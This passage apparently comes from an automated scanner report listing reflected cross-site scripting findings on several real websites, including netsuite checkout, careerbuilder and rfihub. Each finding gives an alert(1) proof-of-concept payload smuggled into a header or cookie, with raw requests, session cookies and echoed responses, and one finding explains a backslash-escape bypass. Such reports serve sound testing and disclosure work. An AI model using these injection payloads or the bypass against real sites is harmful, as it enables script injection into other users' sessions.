providerPK=1860293&widget.userPK=67922830 HTTP/1.1
Host: www.widgetserver.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Origin: http://www.widgetbox.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 21:48:29 GMT
Server: Apache/2.2.3 (Red Hat)
Expires: Sun, 7 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
X-UA-Compatible: chrome=1
Vary: Accept-Encoding
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 15150

<!DOCTYPE html>
<html>
<head>
<title>New App</title>
<meta name="viewport" content="width=device-width; initial-scale=1.0; maximum-scale=1.0; user-scalable=0;"/>
<meta name="apple-mobile-web-app-capab
...[SNIP]...
e);

Wbx.Application.hooks = {}

Wbx.Application.configure({
aboutContent: config.aboutText,
aboutImage: config.aboutImg,
adMobAccount: config.admobAcct,
   applicationTitle: "New App3f3c8";alert(1)//c8b66430a224ecbcd",
   applicationTitleImage: config.titleImg,
   cssContent: config.cssContent,
   menuListImage: config.headerImg,
   navigationStyle: config.navStyle,
pages: [],
phoneIcon: icon,
phoneStar
...[SNIP]...

5.236. https://checkout.netsuite.com/s.nl [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://checkout.netsuite.com
Path:   /s.nl

Issue detail

The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 59e63"-alert(1)-"6ad0caf2cf8 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /s.nl?c=1142057&sc=4&whence=&n=1&ext=F HTTP/1.1
Host: checkout.netsuite.com
Connection: keep-alive
Referer: http://www.magellangps.com/s.nl?sc=3&whence=&custcol_celigo_serialno=
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.1659e63"-alert(1)-"6ad0caf2cf8
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bn_u=6923519460848807096; __utma=19239463.1836009711.1303743280.1303743280.1303743280.1; __utmz=19239463.1303743280.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); mbox=PC#1303736347554-914602.17#1304955927|check#true#1303746387|session#1303743154006-383984#1303748187; JSESSIONID=RPwlN37bBGN1BHsvqNxQ1vGBsr26W2BPCyktJKKZMYNbn8B0yWp44RPTyL4skYr9MQJLJQclG4l9NpdBQ6NlhFTGlWJt4trMCxT6LyM5FzLTxKnn4bw07h6pskHCrpHz!534658191; NLVisitorId=rcHW8655Ac-HwJur; NLShopperId=rcHW8655AeSHwA-v; gc=1142057_clear; NS_VER=2011.1.0

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 21:51:02 GMT
Server: Apache
Cache-Control: No-Cache,no-store
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -1256010395:616363742D6A6176613034302E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: gc=1142057_clear; domain=checkout.netsuite.com; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=918
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 83888


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>
...[SNIP]...
ion','ordernumber') : unknown record type null]------&_exc="+exceptionInfo+"-----Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.1659e63"-alert(1)-"6ad0caf2cf8");
}
};
</script>
...[SNIP]...

5.237. https://checkout.netsuite.com/s.nl [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://checkout.netsuite.com
Path:   /s.nl

Issue detail

The value of the User-Agent HTTP header is copied into a JavaScript rest-of-line comment. The payload f43cc</script><script>alert(1)</script>3f14fd6293f was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /s.nl?c=1142057&sc=4&whence=&n=1&ext=F HTTP/1.1
Host: checkout.netsuite.com
Connection: keep-alive
Referer: http://www.magellangps.com/s.nl?sc=3&whence=&custcol_celigo_serialno=
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16f43cc</script><script>alert(1)</script>3f14fd6293f
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bn_u=6923519460848807096; __utma=19239463.1836009711.1303743280.1303743280.1303743280.1; __utmz=19239463.1303743280.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); mbox=PC#1303736347554-914602.17#1304955927|check#true#1303746387|session#1303743154006-383984#1303748187; JSESSIONID=RPwlN37bBGN1BHsvqNxQ1vGBsr26W2BPCyktJKKZMYNbn8B0yWp44RPTyL4skYr9MQJLJQclG4l9NpdBQ6NlhFTGlWJt4trMCxT6LyM5FzLTxKnn4bw07h6pskHCrpHz!534658191; NLVisitorId=rcHW8655Ac-HwJur; NLShopperId=rcHW8655AeSHwA-v; gc=1142057_clear; NS_VER=2011.1.0

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 21:51:13 GMT
Server: Apache
Cache-Control: No-Cache,no-store
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: 1665579405:616363742D6A6176613034302E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: gc=1142057_clear; domain=checkout.netsuite.com; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=765
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 83932


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>
...[SNIP]...
ptlet.nl?script=94&deploy=1&compid=1142057&h=f5940e0c3bb4a600755b&_orderNo=&_exc=Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16f43cc</script><script>alert(1)</script>3f14fd6293f");
/* another GA account UA-22755206-1 */
var pageTracker1 = _gat._getTracker("UA-22755206-1");
pageTracker1._setDomainName("none");
pageTracker1._setAllowLinker(true);
pageTracker1
...[SNIP]...

5.238. http://www.careerbuilder.com/iframe/recommendedcvupload.aspx [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.careerbuilder.com
Path:   /iframe/recommendedcvupload.aspx

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 75715\'%3balert(1)//8dbcb7e0cd9 was submitted in the Referer HTTP header. This input was echoed as 75715\\';alert(1)//8dbcb7e0cd9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /iframe/recommendedcvupload.aspx?pagever=NewMSN HTTP/1.1
Host: www.careerbuilder.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=75715\'%3balert(1)//8dbcb7e0cd9
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CB%5FSID=66ee7709ffa3453389de6128eeb18875-357143948-w4-6; BID=X1B5CE6DB054A3B8D64198121F94D45E247F1DE3EBA3E204F258F8D2F5D9E98B1FB41E77395140550B900D87EFE23B4943

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
X-Powered-By: ASP.NET
X-PBY: REBEL52
Date: Tue, 26 Apr 2011 18:43:23 GMT
Connection: close
Content-Length: 45799

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Find J
...[SNIP]...
.careerbuilder.com/iframe/recommendedcvupload.aspx';
s_cb.server='www';
s_cb.eVar11='NotRegistered';
s_cb.eVar15='NO_NotRegistered';
s_cb.eVar16='natural (google) - 75715\\';alert(1)//8dbcb7e0cd9';
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s_cb.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

5.239. http://a.rfihub.com/ca.html [a cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.rfihub.com
Path:   /ca.html

Issue detail

The value of the a cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c028f"><script>alert(1)</script>de5d22cc79e was submitted in the a cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ca.html?ra=8435996260.2377219032496214&rb=271&ca=1783&rc=10.2&rd=&ua=&ub=&uc=&ud=&ue=&pa=ppre843599625685&pb=&pc=&pd=&pg=&ct=1303843599626 HTTP/1.1
Host: a.rfihub.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=1676624;type=count339;cat=landi852;u2=14610_0957_9_95;u4=38954353;u5=;u6=;u7=;ord=1;num=4579132553189.993?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: a1=1CAESEAcpLdw2F6J1UKMXA_aMRok; t=1303177639870; a2=2724386019227846218; t1=1303177640912; a=c614741349159218131c028f"><script>alert(1)</script>de5d22cc79e; o=1-LUTRuF4-Pbpl; r=1303177638413; m="aAYCw2HtA==AI20473803AAABL25eZA0=AI20473803AAABL2uPV5g=AI20473803AAABL2uO-2o=AI20473803AAABL2uO0Aw=AI20473803AAABL2t9WLo=AI20473803AAABL2t7Sso=AI20473803AAABL2t7Ccw=AI20473803AAABL2t689Q=AI20473803AAABL2t5Lss=AI20473803AAABL2t4MZI=AI20473803AAABL2t4KCQ=AI20473803AAABL2t1-xQ=AI20473803AAABL2t1V3U=AI20473803AAABL2t1PoY=AI20473803AAABL2tyvMA=AI20473803AAABL2tynx8=AI20473803AAABL2tyZ9U=AI20473803AAABL2tyWc8=AI20473803AAABL2tyV4o=AI20473803AAABL2tyUIY=AI20473803AAABL2tyP8A=AI20473803AAABL2tyMOY=AI20473803AAABL2tyLJ0=AI20473803AAABL2twsg0="; u="aABWHF68w==AI89bBrQ==AAABL25eZA0="; f="aACMzXZKQ==AK1303226770AB1AAABL25eZA0=AK1303177638AC23AAABL2uPV5c="; k="aACM4yRNg==ALnca20473803AN1299695883000AAABL25eZA0=AM-nca20473803AN1299695883000AAABL2twsg0="; e=co

Response

HTTP/1.1 200 OK
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: b="aABHuGj_Q==AC82AAABL5MiXCM=";Path=/;Domain=.rfihub.com;Expires=Thu, 25-Oct-12 18:46:33 GMT
Set-Cookie: m="aAZCcENWg==AE1783AAABL5MiXCM=AI20473803AAABL25eZA0=AI20473803AAABL2uPV5g=AI20473803AAABL2uO-2o=AI20473803AAABL2uO0Aw=AI20473803AAABL2t9WLo=AI20473803AAABL2t7Sso=AI20473803AAABL2t7Ccw=AI20473803AAABL2t689Q=AI20473803AAABL2t5Lss=AI20473803AAABL2t4MZI=AI20473803AAABL2t4KCQ=AI20473803AAABL2t1-xQ=AI20473803AAABL2t1V3U=AI20473803AAABL2t1PoY=AI20473803AAABL2tyvMA=AI20473803AAABL2tynx8=AI20473803AAABL2tyZ9U=AI20473803AAABL2tyWc8=AI20473803AAABL2tyV4o=AI20473803AAABL2tyUIY=AI20473803AAABL2tyP8A=AI20473803AAABL2tyMOY=AI20473803AAABL2tyLJ0=AI20473803AAABL2twsg0=";Path=/;Domain=.rfihub.com;Expires=Thu, 25-Oct-12 18:46:33 GMT
Set-Cookie: u="aABIE_76Q==AI89bBrQ==AAABL5MiXCM=";Path=/;Domain=.rfihub.com;Expires=Thu, 25-Oct-12 18:46:33 GMT
Set-Cookie: f="aADIrk2uw==AK1303843593AB1AAABL5MiXCI=AK1303226770AB1AAABL25eZA0=AK1303177638AC23AAABL2uPV5c=";Path=/;Domain=.rfihub.com;Expires=Thu, 25-Oct-12 18:46:33 GMT
Set-Cookie: k="aADjZOznQ==AI-nca1783AN1303150295000AAABL5MiXCI=ALnca20473803AN1299695883000AAABL25eZA0=AM-nca20473803AN1299695883000AAABL2twsg0=";Path=/;Domain=.rfihub.com;Expires=Thu, 25-Oct-12 18:46:33 GMT
Set-Cookie: e=cb;Path=/;Domain=.rfihub.com;Expires=Thu, 25-Oct-12 18:46:33 GMT
Cache-Control: no-cache
Content-Type: text/html; charset=iso-8859-1
Content-Length: 1093

<html><body><img src="http://pixel.rubiconproject.com/tap.php?v=4140" border="0"
width="1" height="1">
<img src='http://image2.pubmatic.com/AdServer/Pug?vcode=bz0xJnR5cGU9MSZjb2RlPTYxNyZ0bD0xNTc2ODAw
...[SNIP]...
<img src="http://ib.adnxs.com/pxj?bidder=18&action=setuids('614741349159218131c028f"><script>alert(1)</script>de5d22cc79e','1CAESEAcpLdw2F6J1UKMXA_aMRok');&redir=http%3A%2F%2Fib.adnxs.com%2Fgetuidu%3Fhttp%3A%2F%2Fa.rfihub.com%2Fcm%3Fapxuid%3D%24UID%26forward%3D" width="1" height="1">
...[SNIP]...

5.240. http://a.rfihub.com/ca.html [a1 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.rfihub.com
Path:   /ca.html

Issue detail

The value of the a1 cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 30897"><script>alert(1)</script>7ab7a776cb7 was submitted in the a1 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ca.html?ra=8435996260.2377219032496214&rb=271&ca=1783&rc=10.2&rd=&ua=&ub=&uc=&ud=&ue=&pa=ppre843599625685&pb=&pc=&pd=&pg=&ct=1303843599626 HTTP/1.1
Host: a.rfihub.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=1676624;type=count339;cat=landi852;u2=14610_0957_9_95;u4=38954353;u5=;u6=;u7=;ord=1;num=4579132553189.993?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: a1=1CAESEAcpLdw2F6J1UKMXA_aMRok30897"><script>alert(1)</script>7ab7a776cb7; t=1303177639870; a2=2724386019227846218; t1=1303177640912; a=c614741349159218131; o=1-LUTRuF4-Pbpl; r=1303177638413; m="aAYCw2HtA==AI20473803AAABL25eZA0=AI20473803AAABL2uPV5g=AI20473803AAABL2uO-2o=AI20473803AAABL2uO0Aw=AI20473803AAABL2t9WLo=AI20473803AAABL2t7Sso=AI20473803AAABL2t7Ccw=AI20473803AAABL2t689Q=AI20473803AAABL2t5Lss=AI20473803AAABL2t4MZI=AI20473803AAABL2t4KCQ=AI20473803AAABL2t1-xQ=AI20473803AAABL2t1V3U=AI20473803AAABL2t1PoY=AI20473803AAABL2tyvMA=AI20473803AAABL2tynx8=AI20473803AAABL2tyZ9U=AI20473803AAABL2tyWc8=AI20473803AAABL2tyV4o=AI20473803AAABL2tyUIY=AI20473803AAABL2tyP8A=AI20473803AAABL2tyMOY=AI20473803AAABL2tyLJ0=AI20473803AAABL2twsg0="; u="aABWHF68w==AI89bBrQ==AAABL25eZA0="; f="aACMzXZKQ==AK1303226770AB1AAABL25eZA0=AK1303177638AC23AAABL2uPV5c="; k="aACM4yRNg==ALnca20473803AN1299695883000AAABL25eZA0=AM-nca20473803AN1299695883000AAABL2twsg0="; e=co

Response

HTTP/1.1 200 OK
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: b="aABHuHZBw==AC82AAABL5MiWpQ=";Path=/;Domain=.rfihub.com;Expires=Thu, 25-Oct-12 18:46:32 GMT
Set-Cookie: m="aAZ8O9uZA==AE1783AAABL5MiWpQ=AI20473803AAABL25eZA0=AI20473803AAABL2uPV5g=AI20473803AAABL2uO-2o=AI20473803AAABL2uO0Aw=AI20473803AAABL2t9WLo=AI20473803AAABL2t7Sso=AI20473803AAABL2t7Ccw=AI20473803AAABL2t689Q=AI20473803AAABL2t5Lss=AI20473803AAABL2t4MZI=AI20473803AAABL2t4KCQ=AI20473803AAABL2t1-xQ=AI20473803AAABL2t1V3U=AI20473803AAABL2t1PoY=AI20473803AAABL2tyvMA=AI20473803AAABL2tynx8=AI20473803AAABL2tyZ9U=AI20473803AAABL2tyWc8=AI20473803AAABL2tyV4o=AI20473803AAABL2tyUIY=AI20473803AAABL2tyP8A=AI20473803AAABL2tyMOY=AI20473803AAABL2tyLJ0=AI20473803AAABL2twsg0=";Path=/;Domain=.rfihub.com;Expires=Thu, 25-Oct-12 18:46:32 GMT
Set-Cookie: u="aABIFAwdw==AI89bBrQ==AAABL5MiWpM=";Path=/;Domain=.rfihub.com;Expires=Thu, 25-Oct-12 18:46:32 GMT
Set-Cookie: f="aADitTrMA==AK1303843592AB1AAABL5MiWpM=AK1303226770AB1AAABL25eZA0=AK1303177638AC23AAABL2uPV5c=";Path=/;Domain=.rfihub.com;Expires=Thu, 25-Oct-12 18:46:32 GMT
Set-Cookie: k="aADG3pD0w==AI-nca1783AN1303150295000AAABL5MiWpM=ALnca20473803AN1299695883000AAABL25eZA0=AM-nca20473803AN1299695883000AAABL2twsg0=";Path=/;Domain=.rfihub.com;Expires=Thu, 25-Oct-12 18:46:32 GMT
Set-Cookie: e=cb;Path=/;Domain=.rfihub.com;Expires=Thu, 25-Oct-12 18:46:32 GMT
Cache-Control: no-cache
Content-Type: text/html; charset=iso-8859-1
Content-Length: 1093

<html><body><img src="http://pixel.rubiconproject.com/tap.php?v=4140" border="0"
width="1" height="1">
<img src='http://image2.pubmatic.com/AdServer/Pug?vcode=bz0xJnR5cGU9MSZjb2RlPTYxNyZ0bD0xNTc2ODAw
...[SNIP]...
<img src="http://ib.adnxs.com/pxj?bidder=18&action=setuids('614741349159218131','1CAESEAcpLdw2F6J1UKMXA_aMRok30897"><script>alert(1)</script>7ab7a776cb7');&redir=http%3A%2F%2Fib.adnxs.com%2Fgetuidu%3Fhttp%3A%2F%2Fa.rfihub.com%2Fcm%3Fapxuid%3D%24UID%26forward%3D" width="1" height="1">
...[SNIP]...

5.241. http://ar.voicefive.com/bmx3/broker.pli [BMX_3PC cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the BMX_3PC cookie is copied into the HTML document as plain text between tags. The payload abbaf<script>alert(1)</script>94d12c45380 was submitted in the BMX_3PC cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p91136705&PRAd=296638381&AR_C=211671727 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/NYC/iview/296638381/direct;;wi.300;hi.250/01?click=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p97174789=exp=24&initExp=Sun Apr 24 12:09:48 2011&recExp=Tue Apr 26 14:21:11 2011&prad=253732015&arc=178113848&; ar_p92429851=exp=1&initExp=Tue Apr 26 18:36:13 2011&recExp=Tue Apr 26 18:36:13 2011&prad=296638382&arc=200925855&; BMX_3PC=1abbaf<script>alert(1)</script>94d12c45380; UID=875e3f1e-184.84.247.65-1303349046; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1303842976%2E104%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 26 Apr 2011 18:40:28 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p91136705=exp=1&initExp=Tue Apr 26 18:40:28 2011&recExp=Tue Apr 26 18:40:28 2011&prad=296638381&arc=211671727&; expires=Mon 25-Jul-2011 18:40:28 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 26481

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"296638381",Pid:"p91136705",Arc:"211671727",Location:
...[SNIP]...
X.Broker.Cookies={ "UID": '875e3f1e-184.84.247.65-1303349046', "ar_p97174789": 'exp=24&initExp=Sun Apr 24 12:09:48 2011&recExp=Tue Apr 26 14:21:11 2011&prad=253732015&arc=178113848&', "BMX_3PC": '1abbaf<script>alert(1)</script>94d12c45380', "BMX_G": 'method%2D%3E%2D1%2Cts%2D%3E1303842976%2E104%2Cwait%2D%3E10000%2C', "ar_p92429851": 'exp=1&initExp=Tue Apr 26 18:36:13 2011&recExp=Tue Apr 26 18:36:13 2011&prad=296638382&arc=200925855&',
...[SNIP]...

5.242. http://ar.voicefive.com/bmx3/broker.pli [BMX_G cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the BMX_G cookie is copied into the HTML document as plain text between tags. The payload 60dd7<script>alert(1)</script>dccd8ad0c81 was submitted in the BMX_G cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p91136705&PRAd=296638381&AR_C=211671727 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/NYC/iview/296638381/direct;;wi.300;hi.250/01?click=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p97174789=exp=24&initExp=Sun Apr 24 12:09:48 2011&recExp=Tue Apr 26 14:21:11 2011&prad=253732015&arc=178113848&; ar_p92429851=exp=1&initExp=Tue Apr 26 18:36:13 2011&recExp=Tue Apr 26 18:36:13 2011&prad=296638382&arc=200925855&; BMX_3PC=1; UID=875e3f1e-184.84.247.65-1303349046; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1303842976%2E104%2Cwait%2D%3E10000%2C60dd7<script>alert(1)</script>dccd8ad0c81

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 26 Apr 2011 18:40:29 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p91136705=exp=1&initExp=Tue Apr 26 18:40:29 2011&recExp=Tue Apr 26 18:40:29 2011&prad=296638381&arc=211671727&; expires=Mon 25-Jul-2011 18:40:29 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 26481

